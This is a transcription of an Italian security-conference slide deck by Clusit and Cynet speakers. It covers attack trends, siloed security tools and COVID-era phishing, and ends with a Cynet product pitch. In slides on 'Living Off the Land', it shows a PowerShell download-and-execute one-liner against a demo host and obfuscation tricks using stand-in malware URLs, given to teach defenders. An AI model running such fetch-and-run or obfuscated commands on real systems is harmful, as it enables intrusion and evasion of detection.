Tanti tool di security ma gli incidenti aumentano, serve un approccio olistico
←
→
Trascrizione del contenuto della pagina
Se il tuo browser non visualizza correttamente la pagina, ti preghiamo di leggere il contenuto della pagina quaggiù
Atelier
Tanti tool di security ma gli incidenti
aumentano, serve un approccio olistico
Mauro Cicognini, Comitato Direttivo Clusit
Luca Martinis, Security Engineer Southern Europe, Cynet
4 giugno 11:00-12:00 - StreamingEdition
#securitysummit #academy #streamingedition
Mauro Cicognini
Slide di sfondo
Testo editabile
MEMBRO DEL CONSIGLIO DIRETTIVO CLUSIT
2
Agenda
• Stato della cybersecurity
• La crescita degli attacchi
• Contromisure?
• Le sfide che le aziende devono affrontare
• Con quali strumenti affrontiamo le minacce?
• Il disinnesco di attacchi evoluti
3
Stato della cybersecurity
• Investimenti crescenti
• Un mercato molto
complesso
• Soluzioni tecnologiche
sempre più spinte
• Preoccupazione crescente
per le attività illecite e le
loro conseguenze
4
Mercato mondiale della cybersecurity
300
248,26
250
223,68
202,97
200 184,19
167,14
151,67
150 137,63
100
50
0
2017 2018 2019 2020 2021 2022 2023
USD (Miliardi) Fonte: www.statista.com
5
Un mercato molto affollato
Crescita di frequenza degli attacchi (ca. 15% annuo)
Numero di attacchi rilevati per anno (2014 - 2019)
1750
1650
1550
1450
1350
1250
1150
1050
950
850
750
2014 2015 2016 2017 2018 2019
© Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia
7
Crescita di intensità degli attacchi
Motivazioni d’attacco 2014 - 2019
90% 83%
79%
76%
80% 72%
68%
70%
60%
60% 2014
2015
50%
2016
40%
2017
27%
30% 2018
21%
20% 13% 12% 15% 2019
8% 9% 8% 11% 7%
10% 4% 3% 5% 5% 6% 4%
2% 2%
0%
CYBERCRIME ESPIONAGE HACKTIVISM INFO. WAR.
© Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia
8
Crescita di efficacia degli attacchi
Attack Severity
60%
50%
40%
30%
20%
10%
0%
Medio Alto Critico
2017 2018 2019
© Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia
9
Crescita di intrusività degli attacchi
Distribuzione % tecniche di attacco (2014 - 2019)
45%
40%
35%
30%
25% 2014
20% 2015
15% 2016
10% 2017
5% 2018
0% 2019
© Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia
10Tecniche utilizzate nel 2019
• Eliminando gli attacchi
Account 0-day DDoS
Cracking 2% 2%
APT / 5%
Tecniche
con tecnica non nota, Multiple
6%
otteniamo che l’85%
Vulnerab.
degli attacchi avviene 9%
con metodologie ben Phishing /
Malware
54%
Social
conosciute Engineering
22%
© Clusit - Rapporto 2020 sulla Sicurezza ICT in Italia
11Quindi???
• Investiamo sempre di più
• Con soluzioni sempre più
sofisticate
• I cattivi continuano a vincere
• Dov’è il problema??
12Un problema di velocità
• Evidentemente le
necessità crescono più
velocemente dei
rimedi
• Perché?
13Motivazioni
• La scarsità di know-how
è palpabile
• Lo sappiamo di sicuro
da numerose indagini
• Tutti conosciamo
situazioni dove mancano
le persone giuste,
oppure le persone giuste
sono nel posto sbagliato
14Miglioramento dei processi
• In molte realtà i processi di
sicurezza devono ancora
maturare
• Esistono molti schemi e
proposte
• L’importante è adottarne
uno e sfruttarlo appieno
• P.e.quello proposto dal
NIST
• https://www.nist.gov/cyber
framework/framework Fonte: NIST
15Tecnologia
• Naturalmente, è meglio
farsi aiutare dalla
tecnologia
• Tecnologia ben
implementata, perché
altrimenti non serve
• Occorrono i processi e
le persone in grado di
farli funzionare
16Luca Martinis Slide di sfondo
Testo editabile
SECURITY ENGINEER SOUTHERN EUROPE, CYNET
17Il paradosso delle attuali misure di protezione
Diminuzione del ritorno sugli
Numero di violazioni in aumento
investimenti in sicurezza
1800
1600
1400
1200
1000
800
600
400
200
0 2019
2006 2008 2010 2012 2014 2016 2018
Source: marketwatch.com Source: based on statista.com
18La Causa: Soluzioni di Security a silo
ANTIVIRUS
Disparate Point Products
Each product covers a mere subset of threats
ANTIVIRUS
without communicating with its peers
EMAIL USER Hard Deployment
PROTECTION BEHAVIOR 40% avg. security product implementation rate
SANDBOX
SIEM
ANALYTICS
Manual Integration
Creating a holistic threat visibility requires
significant skill and time resources
DECEPTION
NEXT-GEN
ANTIVIRUS Partial Threat Coverage
Critical attack vectors are left unattended
19Le sfide che l’azienda deve affrontare
Le nuove piattaforme devono abilitare le aziende nel superare:
Il team di sicurezza è Implementazione
troppo piccolo per manuale e configurazione
Staff rispondere in modo Time di più prodotti di sicurezza
efficiente a tutti gli avvisi che richiedono tempo
Il budget non è sufficiente
Carenza di personale per acquistare tutti i prodotti
qualificato in grado di e i servizi necessari per
Skill affrontare minacce avanzate Budget proteggersi da attacchi e
minacce avanzate
20Incremento negli attacchi di phishing
March 2020: Italy Stands out
April 2020: The World Follows Suit
80
90
70 80
60 70
60
50
50
40 40
30 30
20
20
10
10 0
0
Israel Japan Benelux France Germany Italy UK USA
February 15 -March 15 2020 Monthly Average 2019
21Incremento nei Malicious Remote Logins (Global)
Malicious Logins
900
800
700
600
500
400
300
200
100
0
Sep-19 Oct-19 Nov-19 Dec-19 Jan-20 Feb-20 Mar-20 Apr-20
22Incremento negli Email Based Attacks (Global)
10000
9000
8000
7000
6000
5000
4000
3000
2000
1000
0
Sep-19 Oct-19 Nov-19 Dec-19 Jan-20 Feb-20 Mar-20 Apr-20
23Distribuzione dei Malware via Email
Percentages
Weaponized document: Macro
18%
31%
Weaponized document: Office
Exploit
Email with link to malicious
website
Email containing malicious 40% 11%
executable
24Incremento negli ingaggi CyOps
1000
900
800
700
600
500
400
300
200
100
0
Oct-19 Nov-19 Dec-19 Jan-20 Feb-20 Mar-20 Apr-20
25Campagna di phishing
legata al Covid:
• Dal 1 giugno, rilascio
della app Immuni per il
controllo del
distanziamento sociale
• ransomware
• immuni.exe
26LOL
LOL ≠ Lot Of Laughs
Per le aziende colpite da questi attacchi
c’è ben poco da ridere.
Living Off the Land:
• LoLBins
• LoLdlls
• LoLBaS
• LoL.. everything
(source: https://lolbas-project.github.io)
27POWERSHELL
Powershell fileless attack example:
• powershell.exe – exec bypass
“IEX(New-Object Net.WebClient).DownloadString(’http://www.demo.local/cybad.ps1’)”
PowerShell execution options:
• Registry - This technique was extensively used by Poweliks and kovter malware variants (mshta or rundll
+ ActiveXObject)
• File - .ps1 / .VBS / .BAT and scheduled task
• Macros - Office files- Word, Excel, etc.
• Remotely - PowerShell Remoting (PSS), PsExec, WMI
28OBFUSCATION
PowerShell obfuscation techniques:
1. Concatenation – split strings into multiple parts which are concatenated through the “+” operator as example.
$a = http://malware.com/cybad.exe ---> b = (‘h’+’ttp://ma’+’lware.com/cybad.exe’)
2. Reordering – formatting operator (-f), the string is divided in several parts and will reorder by the (-f).
“{1}{0}” -f ‘x’,’IE’
3. Escaping character– escape character (‘) to trick the analyst to understand command, typically into the middle of the string
http://malware.com/cybad.exe à $a = (“http://mal`ware.c`om.cy`bad.ex`e”)
4. Base64 format – (–EncodedCommand) accepts a base-64 encoded string .
Start-Process “dir “c:\passwords”” à ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA=0g
powershell.exe -encodedCommand ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA=
5. Up/Low case – random uppercase or lowercase in the script.
6. White spaces – random white spaces are inserted between words.
(https://www.cynet.com/blog/powershell-obfuscation-demystified-series-chapter-2-concatenation-and-base64-encoding/)
29La Soluzione: Autonomous Breach Protection
Environment
Endpoint Block traffic
Network
Isolate
endpoint
User File Disable user
account
Avere completa Capire il contesto Decidere
visibilità e Agire
30Sensor
Fusion: "La fusione dei sensori combina i
dati provenienti da fonti
L'intero è disparate in modo che le
informazioni risultanti
maggiore della raggiungano un livello di
precisione che non sarebbe
possibile se queste fonti
somma delle sue venissero utilizzate
singolarmente."
parti
31Autonomous Breach Protection
Powered by Cynet Sensor Fusion™
File Activity
Monitoring &
Process Activity
control
Memory Activity
BREACH Attack
PROTECTION prevention &
Generating True Context
detection
Network Traffic
Response
User Account
orchestration
Activity
SENSOR ARRAY FUSION AND ANALYSIS AUTOMATED
PRECISE ACTION
32Autonomous Breach Protection
Powered by Cynet Sensor Fusion™
Files upload attempted
No screen interaction Block traffic
Host is
operated
BREACH
remotely
PROTECTION Isolate host
Generating True Context
Data Exfiltration
Disable user
Off working hours account
SENSOR ARRAY FUSION AND ANALYSIS AUTOMATED
PRECISE ACTION
33Servizio di Incident
Response incluso
Smart Agent
Deploys itself on 5000 hosts in 1 hour Auto-deployment on new hosts
343 opzioni
Cynet 360 Architetture 1 licenza
On-Prem SaaS Hybrid
351 licenza
Tutto incluso
Technologies
Services
Cynet 360
Capabilities
36CyOps Managed Detection and Response Services
• Alert Monitoring
• 24/7 Availability
• On-Demand File Analysis
• Remediation Instructions
• Exclusions, Whitelisting and
Tuning
• Threat Hunting
• Attack Investigation / Incident
Response
37Autonomous
Breach Protection for the
Autonomous CISO
• Visibilità in tempo reale
dello stato di sicurezza
• Ingaggio del CyOps
team in un click
38The evolution of Endpoint
Protection tools
✓ Vendors with Added Automated
Remediation
✓ Vendors Directly Providing MDR Services
✓ Vendors with combined Network Analytics
and Threat Intelligence
✓ Vendors with MITRE ATT&CK Categorized
Controls
✓ Vendors providing SIEM and SOAR
Integration
✓ Vendors providing Unified Endpoint Security
Platforms
✓ Vendors for Incident Response and Forensics
❖ Combined Mobile Device and Desktop/Laptop
EDR
Source: Gartner Market Guide - January 2020
39Cynet 360 Benefici
• Ridurre radicalmente il tempo impiegato nella distribuzione e nella gestione
• Risparmia denaro che altrimenti veniva speso per i prodotti NGAV, EDR, UBA, Network
Analytics e Deception
• Consolidare la protezione contro tutti i prodotti e le minacce avanzate in un'unica piattaforma
• Abilita il team di sicurezza a risolvere rapidamente gli incidenti con prevenzione, rilevamento
e risposta automatizzati
• Migliora le competenze e le capacità del team di sicurezza con CyOps
• Fornisci visibilità e controllo CISO 24 \ 7 con l'app Cynet CISO
40Grazie per averci
ascoltato fin qui!
Domande?
41Puoi anche leggere
